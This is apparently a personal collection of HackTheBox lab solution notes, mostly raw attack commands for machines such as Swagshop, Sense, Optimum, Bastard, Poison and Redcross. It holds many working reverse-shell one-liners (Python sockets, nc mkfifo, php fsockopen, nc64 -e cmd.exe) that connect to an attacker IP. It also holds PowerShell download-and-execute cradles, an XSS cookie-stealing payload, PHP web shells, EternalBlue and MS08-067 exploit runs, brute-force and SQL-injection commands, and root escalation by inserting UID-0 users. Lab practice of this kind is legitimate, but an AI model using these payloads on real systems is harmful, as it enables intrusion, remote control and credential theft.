Follow this medium series for OSCP based Hackthebox machines writeups without MSF by Rana :)

​https://medium.com/@ranakhalil101/

Swagshop

one way to get root file

sudo /usr/bin/vi /var/www/html/../../../root/root.txt

2nd way

[email protected]:/home/haris$ sudo /usr/bin/vi /var/www/html/a :set shell=/bin/sh :shell

3rd way

sudo vi /var/www/html/a -c ':!/bin/sh'

python magento_rce.py 'http://10.10.10.140/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9001 >/tmp/f"

=============================================================

Arkham

nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt 10.10.10.130

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.130 --rate=700

smbmap -H 10.10.10.130 -u guest -R | tee smbmap.txt
mount -t cifs -o rw,username=guest,uid=0,gid=0 //10.10.10.130/BatShare 

================================================================

Bastion

mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
find /mnt/ -type f
guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2

​

secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7

05/10/2019

Bashed:

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > exploit.py

/dev/shm - writable directory

sudo -u scriptmanager bash

upload reverse shell if normal shell not working

python -c 'import pty;pty.spawn("/bin/bash")'

/usr/share/laudanum/php/php-reverse-shell.php

====================================================================

Nibbles:

hydra -l admin -P rockyou.txt http://ip http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username" - not working ip block

cmd.php

GIF8;

find . | grep controllers

ldd --version - cat /etc/lsb-release

One solution to get root

Create one file monitor.sh

/bin/sh

bash

Other trick to get exploit for ubuntu version --------- Rational love exploit

​https://www.exploit-db.com/exploits/43775​

===================================================

Blue - window machine

Eternal blue : ms 17-010

nmap -p 445 --script safe -Pn -n ip [nmap -p 445 --script "vuln and safe" -Pn -n ip]

Eternal blue exploit manually :https://www.exploit-db.com/download/42030 https://www.exploit-db.com/exploits/42315​

modify the python exploit and put location in our payload

Exploit modification required

add computer name in to host file and then scan smb servers

smbclient -L \10.10.10.40 -N

smbclient \\haris-pc\Users

python exploit.py ip ntsvcs

===========================================================================

Sense - Linux Machine - PFsense

manual cmd injection

/status_rrd_graph_img.php?database=queues;whoami|nc+ip+port

/status_rrd_graph_img.php?database=queues;whoami|nc+ip+port|python

on attacker machine run this command

nc -vnlp port < cmd

In cmd we have this reverse shell code

import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.10",3456)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])

nc -lvnp 3456

exploit-db exploit

=====================================================

Optimum

port 80 is opening httpfileserver

tcpdump -i tun0 %00{.exec|ping 10.10.14.10.}

use invoke-powershelltcp.ps1

C:\Windows\SysWow64 - 32 bit windows C:\Windows\system32 - 32 bit windows C:\Windows\Sysnative - 64 bit

C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.10

ctrl shift u - to decode

C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://ip:port/InvokePowerhsleltcp.ps1').}

sherlock script execute to get the false positive patches

New-Object Net.WebClient}.downloadString('http://ip:port/InvokePowerhsleltcp.ps1')

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 1234

New-Object Net.WebClient}.downloadString('http://10.10.14.10:8000/Sherlock.ps1')

Find-AllVulns

cd /poweshell/Empire/data/module_source/privesc/Invoke-MS16032

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Invoke-MS16032.ps1')

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.10:8000/shell.ps1')"

====================================================

Node - Linux

3000- node

sed 's/,/\n/g' notes - password extract

api/users

crack the hashes online and offline

Hashes crack with hashcat and john hashcat -a0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt cat /home/alamot/.john/john.pot

online - hashes.org

grep -Ri password . | less

fcrackzip for zip files password cracker fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip

download file with wget ; wget --header "Cookie: connect.sid=s%3AuGlwY_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU" http://10.10.10.58:3000/api/admin/backup​

base64 -d myplace.backup >myplace

privsec to tom user

mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler

find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null

db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );

find / -perm -4000 2>/dev/null

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 "asd /bin/bash asd"

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 r??t/roo?.txt

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 root

using wildcard /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /rt/rt.txt | base64 -d > root.zip

command injection:

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')"

=====================================================

Legacy - windows

Samba Scan

nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4

First Exploit - ms08-67
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python ms08-067.py 10.10.10.4 6 445
​

​

wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe

host file with smbserver

smbserver.py a /usr/share/windows-binaries/

\\10.10.14.14\a\whoami.exe

===========================================================

Valentine

heartbleed vulnerability

python heartbleed.py -n 100 ip

for i in ${seq 0 100}; do python heartbleed.py ip; done

https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py​

then find hype.key (hex to ascii)

ssh key and use this key and password get from heartbleed

ssh -i hype.key [email protected]

check the history and check ps elf | grep root

2nd exploit

gcc -pthread dirty.c -o dirty -lcrypt

su -

==============================================

Fuzzy web app challenge‌

gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌

gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌

wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test​‌

wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ​‌

====================================== HDC HackTheBox Web Challenge Walkthrough/Solution‌

so the doProcess() function submits the form data to the jquery, Then i had a look at jquery-3.2.1.js CTRL+F and searched for the doProcess()‌

credentials stored in js file doprocess function‌

find emails on secret folder then run bruteforce in to all emails and get the flag‌

=======================================‌

Lernaean Web Challenge — HackTheBox‌

hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593‌

========================================= CARTOGRAPHER‌

username= ’- and password= ‘ - sql injection‌

info=flag

‌

[20 Points] Lernaean [by Arrexel]‌

hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 35414‌

=========================================== [50 Points]‌

I know Mag1k [by rkmylo]‌

padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"‌

padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}" ​

=======================================================

Bastard - windows

Drupal payload chnages

$url = 'http://10.10.10.9/'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; $phpcode = <<<'EOD' <?php if (isset($_REQUEST['fuplaod'])) { file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.10:8000/" . $REQUEST['fupload'])); }; if (isset($_REQUEST['fexec'])) {

 echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";

}; ?> EOD; $file = [ 'filename' => 'sam.php', 'data' => $ippsec ];

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8080/chimichurri.exe')

\\10.10.14.10\sam\ms15-051x64.exe "\10.10.14.10\sam\nc64.exe -e cmd.exe 10.10.14.10 443" [#] ms15-051 fixed by zcgonvh powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:8000/Invoke-PowerShellTcp.ps1')

\10.10.14.10\a\ms15-051x64.exe "\10.10.14.10\a\nc64.exe -e cmd.exe 10.10.14.10 443"

powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:8000/mv.ps1')

curl http://10.10.10.9/0xdf.php?cmd=whoami
http://10.10.10.9/0xdf.php?cmd=\\10.10.14.14\share\nc64.exe%20-e%20cmd.exe%2010.10.14.14%20443

​

powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')

Shell with Nishang

python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')"

​

\\10.10.14.14\share\ms15-051x64.exe "whoami"
\\10.10.14.14\share\ms15-051x64.exe "\\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443"

===================================================

Poison

​http://10.10.10.84/browse.php?file=listfiles.php - machine is vulnerable to lfi

add this shell in to user agent

User-Agent: 0xdf: <?php system($_GET['c']); ?>

then check the logs &c=id

connectivity check

​

view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=ping 10.10.14.6
tcpdump -i tun0 icmp

​

view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=nc 10.10.14.6 8081
nc -lnvp 8081

Shell as WWW

Visit view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f,

Listening on localhost:

 netstat -an -p tcp
 ps -auwwx | grep vnc

Tunneling / VNC connection

tail /etc/proxychains.conf
ssh [email protected] -D 8081
proxychains vncviewer 127.0.0.1:5901 -passwd secret

Looking inside /root/.vnc/, there’s a passwd file that matches the file secret:

python /opt/vncpasswd.py/vncpasswd.py -d -f secret

LFi Filter :- php://filter/convert.base64-encode/resource=index.php

Request to add data in php variable which is visible on phpinfo.

Content-Type: multipart/form-data; boundary=--PleaseSubscribe

Content-Length: 166 ----PleaseSubscribe

Content-Disposition: form-data; name="sam"; filename="Leaveacomment"

Content-type:text/plain

Please share my videos

====================================================

Brainfuck:

python sshng2john.py id_rsa > braingfuck-crack

john brainfuck-crack --wordlist=/usr/share/wordlis ts/rockyou.txt

wpscan –url https://brainfuck.htb –disable-tls-checks

cp /usr/share/exploitdb/exploits/php/webapps/40939.txt .

wordpress exploit -> smtp cred -> smtp cred to get secret forum password - > Encryption decryption

ssh2john id_rsa > id_john

john id_john –wordlist=/usr/share/wordlists/rockyou.txt

In orestis home directory there are a few files debug.txt, encrypt.sage and output.txt After some google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large)https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e python -c “print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, ‘x’).decode(‘hex’)” 6efc1a5dbb8904751ce6566a305bb8ef

​​​=================================================

grandparents (granny & grandpa

granny & grandpa

iptables -A OUTPUT -d 10.10.10.14 -j DROP

davtest --url http://10.10.10.15​

move options check move ippsec.html destination ippsec.aspx

ms14-070 exploit work for root ms15-051 - not work

curl -X PUT http://10.10.10.15/shell.txt --data -binary @shell.aspx curl -X MOVE -H 'Destination: http://10.10.10.1 5/shell.aspx' http://10.10.10.15/shell.txt​

curl http://10.10.10.15/shell.aspx​

Reverse shell on metasploit

check 3 exploits for privilege escalation : ms16-016 ms15-051 ms14-058 - working fine msf5 exploit(windows/local/ms14_058_track_popup_menu)

post(multi/recon/local_exploit_suggester)

Microsoft IIS WebDav ‘ScStoragePathFromUrl’ Remote Buffer Overflow

grandpa:

. Use exploit/windows/iis/iis_webdav_scstoragepathfromurl. As we can see below, set options. << use exploit/windows/iis/iis_webdav_scstoragepathfromurl>> << options >> << set RHOST 10.10.10.14>> <<set LHOST <attacking machine ip> >> <<set LPORT 1234>>

<< use exploits/windows/local/ms15_051_client_copy_image >> << options >>

============================================

Redcross

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u https://10.10.10.113 -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20
​

Xss payload in to contact us form

<script>new Image().src="http://10.10.14.14:8888/cookie.php?c="+document.cookie;</script>

SQLi

On submitting the UserID filter, I’m sent to https://intra.redcross.htb/?o=1&page=app, where o= is the id filtered on. If I try with a ' in there, https://intra.redcross.htb/?o=1'&page=app:

 sqlmap -r app.request --delay=1 --batch --dump
 sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs

nmap -p- --min-rate 5000 10.10.10.113

python 41162.py -c "ping -c 1 10.10.14.14" -t [email protected] -m 10.10.10.113
tcpdump -i tun0 -n icmp
python 41162.py -c "php -r '\$sock=fsockopen(\"10.10.14.14\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t [email protected] -m 10.10.10.113

Injection RCE

Brup Suite RCE :

ip=1;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.23",4444))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&action=deny

Priv esc to penelope

s = smtplib.SMTP(mailserver,1025)
./h.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.23\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t [email protected] -f [email protected] -m redcross

Priv esc to root

[email protected]:/etc$ psql -h 127.0.0.1 -U unixnss -W unix

openssl passwd -1 0xdf

insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope');

Path 1: sudoers Group

insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
sudo su

Path 2: Via unixnssroot

unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root');

Find psql Configs

ls -l nss-pgsql*
cat nss-pgsql-root.conf 
psql -h 127.0.0.1 -U unixnssroot -p 5432 -d unix

This user can add a user with user id 0 (root):

insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root');
su r0xdfot

Using this account, we are able to create a new user with UID 0:

insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root');